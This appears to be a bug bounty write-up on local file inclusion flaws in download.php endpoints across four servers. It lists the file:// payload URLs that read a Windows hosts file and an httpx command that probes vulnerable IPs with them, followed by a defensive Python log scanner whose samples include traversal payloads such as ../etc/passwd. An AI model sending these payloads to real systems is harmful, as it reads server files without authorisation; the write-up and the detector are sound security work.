Multiple Local File Inclusions Flaws


Brief Description

Multiple LFI flaws were discovered in a popular host target during a QR. The target had been widely tested before, and the client's web targets were similar to its host targets, which made the recon phase easier. In this case, four different servers were found to share the same flaw through two parameters, f and file, so the web targets and the host targets turned out to have the same root cause.

Reconnaissance Steps

By gathering the endpoints that had been reported before (see the Local File Inclusion Write-Up) from Analytics on the web targets, I built a list of endpoints, including the LFI payloads, as follows:

/player/download.php?f=file:///C:/WINDOWS/System32/drivers/etc/hosts
/formacion/download.php?f=file:///C:/WINDOWS/System32/drivers/etc/hosts
/testip/download.php?file=file:///C:/WINDOWS/System32/drivers/etc/hosts
/telepresence/download.php?f=file:///C:/WINDOWS/System32/drivers/etc/hosts
/santander/download.php?f=file:///C:/WINDOWS/System32/drivers/etc/hosts

Then, using httpx and Burp Suite, I tested the endpoints against the vulnerable IPs and routed the web traffic through Burp Suite to build a better proof of concept. The following httpx command was used:

httpx -l vulnerable-ips.txt -paths vulnerable-endpoints.txt --http-proxy=http://localhost:8080


After sending the traffic through Burp Suite, the proof of concept confirmed the flaw through the two parameters on four different web servers across the listed endpoints.
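A defender-side complement to the probes above, added here as an example that is not part of the original write-up: a small Python checker that reads constructed Apache-style access-log lines and flags any request whose f or file parameter carries a file:// URI, a traversal sequence or an absolute path, the shapes the payloads above use. The log lines and IPs are constructed for the example.

```python
from urllib.parse import urlsplit, parse_qs, unquote

# Query parameters the write-up found to be injectable on the download.php endpoints.
SUSPECT_PARAMS = {"f", "file"}


def is_lfi_attempt(value: str) -> bool:
    """True if a parameter value has the shape of a local file inclusion payload."""
    v = unquote(unquote(value)).lower()          # collapse double URL-encoding first
    if v.startswith("file:"):                    # file:// URI scheme, as in the report
        return True
    if "../" in v or "..\\" in v:                # directory traversal
        return True
    if v.startswith("/") or v[1:3] in (":/", ":\\"):  # absolute *nix or Windows path
        return True
    return False


def scan_access_log(lines):
    """Return (client_ip, path, param, value) for each request that looks like an LFI probe."""
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) < 7:                       # not a combined-format line; skip
            continue
        ip, request_target = parts[0], parts[6]  # fields: ip - - [time] "METHOD target ..."
        url = urlsplit(request_target)
        for name, values in parse_qs(url.query, keep_blank_values=True).items():
            if name not in SUSPECT_PARAMS:
                continue
            for val in values:
                if is_lfi_attempt(val):
                    hits.append((ip, url.path, name, val))
    return hits


# Constructed sample log lines (Apache combined format); not taken from the original post.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /player/download.php?f=file:///C:/WINDOWS/System32/drivers/etc/hosts HTTP/1.1" 200 512 "-" "curl/7.88"',
    '203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /testip/download.php?file=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1280 "-" "curl/7.88"',
    '198.51.100.9 - - [10/Oct/2023:13:56:01 +0000] "GET /player/download.php?f=report-2023.pdf HTTP/1.1" 200 9031 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Oct/2023:13:56:05 +0000] "GET /index.php?f=file:///etc/passwd HTTP/1.1" 404 210 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print("LFI probe:", hit)
```

The check is deliberately on the parameter value's shape rather than the response code, so a probe that was blocked (404) is still surfaced for triage.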


After the report was submitted, the VO accepted it, which won the QR, and added an extra 30% to the reward.


Takeaways

For people on Synack, be curious and test from web targets to host targets that share a similar name, since they may share the same technology infrastructure and therefore the same flaws. Don't forget to check Analytics!
